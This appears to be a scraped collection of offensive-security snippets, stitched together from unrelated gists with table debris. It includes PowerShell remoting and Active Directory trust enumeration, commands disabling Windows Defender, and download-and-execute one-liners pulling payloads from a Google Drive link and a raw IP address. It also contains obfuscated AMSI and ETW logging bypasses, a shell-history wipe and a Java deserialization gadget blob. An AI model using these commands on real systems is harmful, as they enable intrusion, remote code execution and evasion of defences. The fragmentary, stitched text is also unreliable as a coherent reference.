Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
$session=New-PSSession –Computername Server1 | |
Enter-PSSession $session | |
Set-MpPreference -DisableRealtimeMonitoring $true | |
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections | |
$ExecutionContext.SessionState.LanguageMode | |
#Enum Applocker policy if you stumble upon constrained language mode |
#I forked this from somewhere but i forgot where, it a had a regex bug which i fixed. | |
import re | |
fileToRead = 'emails.txt' | |
fileToWrite = 'emailExtracted.txt' | |
delimiterInFile = [',', ';'] | |
def validateEmail(strEmail): | |
# .* Zero or more characters of any type. | |
if re.match("(.*)@(.*)\.(.*)", strEmail): | |
return True |
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
Note: I did not author this, i found it somehwere.
echo "" > ~/.zsh_history & exec $SHELL -l | |
CLEARS ZSH HISTORY ^^ |
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") | |
## Version1 | |
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')" | |
## Version2 | |
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA |
# Logging bypass: | |
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
# AMSI Bypass (old, burned) | |
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
# New AMSI bypass obfuscation: |
//Disables Windows Defender | |
Set-MpPreference -DisableRealtimeMonitoring $true |
// ==UserScript== | |
// @name fckcustoms | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description Customs are literally scammers | |
// @author You | |
// @require http://code.jquery.com/jquery-3.4.1.min.js | |
// @match https://www.amazon.com/gp/your-account/order-details* | |
// @run-at document-body | |
// @grant none |
rO0ABXNyAElvcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkTWV0aG9kSW52b2tlVHlwZVByb3ZpZGVyskq0B4tBGtcCAANJAAVpbmRleEwACm1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMAAhwcm92aWRlcnQAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL2NvcmUvU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyO3hwAAAAAHQADm5ld1RyYW5zZm9ybWVyc30AAAABAD1vcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyeHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3IAMnN1bi5yZWZsZWN0LmFubm90YXRpb24uQW5ub3RhdGlvbkludm9jYXRpb25IYW5kbGVyVcr1DxXLfqUCAAJMAAxtZW1iZXJWYWx1ZXN0AA9MamF2YS91dGlsL01hcDtMAAR0eXBldAARTGphdmEvbGFuZy9DbGFzczt4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABdAAHZ2V0VHlwZXN9AAAAAgAWamF2YS5sYW5nLnJlZmxlY3QuVHlwZQAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXN4cQB+AAZzcgBgb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuQXV0b3dpcmVVdGlscyRPYmplY3RGYWN0b3J5RGVsZWdhdGluZ0ludm9jYXRpb25IYW5kbGVy |